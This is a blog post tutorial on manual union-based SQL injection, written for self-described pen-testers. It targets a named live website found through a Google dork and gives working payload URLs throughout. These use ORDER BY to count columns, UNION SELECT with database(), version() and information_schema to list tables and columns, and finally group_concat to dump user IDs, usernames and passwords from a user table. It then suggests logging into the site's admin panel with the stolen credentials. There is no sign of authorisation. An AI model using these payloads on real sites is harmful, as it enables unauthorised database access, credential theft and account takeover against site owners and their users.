introduction to SQL injection-Manually Union based

Hey pen-testers, OK today in this post I am going to give a detail on one of the top-most vulnerabilities in today’s world is SQL-Injection.

For this you need a SQL-vulnerable website, Hack-bar a plugin in firefox and that’s it you can download hack-bar from here:https://addons.mozilla.org/en-us/firefox/addon/hackbar/

Ok again back to main point in this article i am using google dork” article.php?id=5″

and I got a website named :www.designsmells.com/article.php?id=5

Now to  check whether  the site is vulnerable to SQL or not we just put the ( ‘ ) without brackets to check as we get the error or not. Here lets see

http://www.designsmells.com/article.php?id=5′; —>points a error so its is clear that we are having a website with SQL injection

error

PART-2 TO GET NUMBER OF COLUMNS

In order to get the number of columns we can use any of the statements

  • ORDER BY
  • GROUP BY
  • PROCEDURE ANALYSES()

so to get the columns we try with “order by” in this with 2 negative signs in the end to make our query as a comment and to get no error while execution:”www.designsmells.com/article.php?id=5 order by 1 –” >turns to no-error

:”www.designsmells.com/article.php?id=5 order by 10 –“>turns to no-error

:”www.designsmells.com/article.php?id=5 order by 15 –” >turns to error

so the number of columns lie between 10<n<15 and keep on checking we get columns 11 as :

1

2

:”www.designsmells.com/article.php?id=5 order by 11–” > no error

then select all the statement after ?id=5 and replace it with “union select 1,2,3,4……..,11 –”

as the url turns to be

:”www.designsmells.com/article.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11– ” and hit enter

3

If there is no change then just add a ” – ” in front of ID and a ” + ” in end so the url becomes :”www.designsmells.com/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11–+ ” and it will dump out the vulnerable columns in order to get database we choose the number which is in “bold letters”

4

PART -3 GETTING CREDENTIALS!!

Here we replace the column number “2” with first “database()” and then “version()” to get the desired database name and version accordingly

and urls become:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,database(),3,4,5,6,7,8,9,10,11–+ ”

the screenshot is there below:

5

then we go for version() check and we get:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11–+ ”

5.1

Now replace the the version with “group_concat(table_name,0x0a)” and add ” from infromation_schema.tables where table_schema=database() ”

and we get the desired url as “www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()–+ ”

6

we get some of the table names and further we now add in url as:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database()–+”

7It will dump out the various columns out of these we focus on either named column admin:login:user etc and here we clearly get the “user_id” & “password” columns So our next step is to get data out of these two:

:”www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(user_id,0x3a,user_name,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11 from book_user–+ ” and thus we get the user id along with its password.

final

Once we found the admin pannel of website either using robots.txt or alchemist admin finder we can enter the website in a genuine way

Stay tuned guys & keep on testing 🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s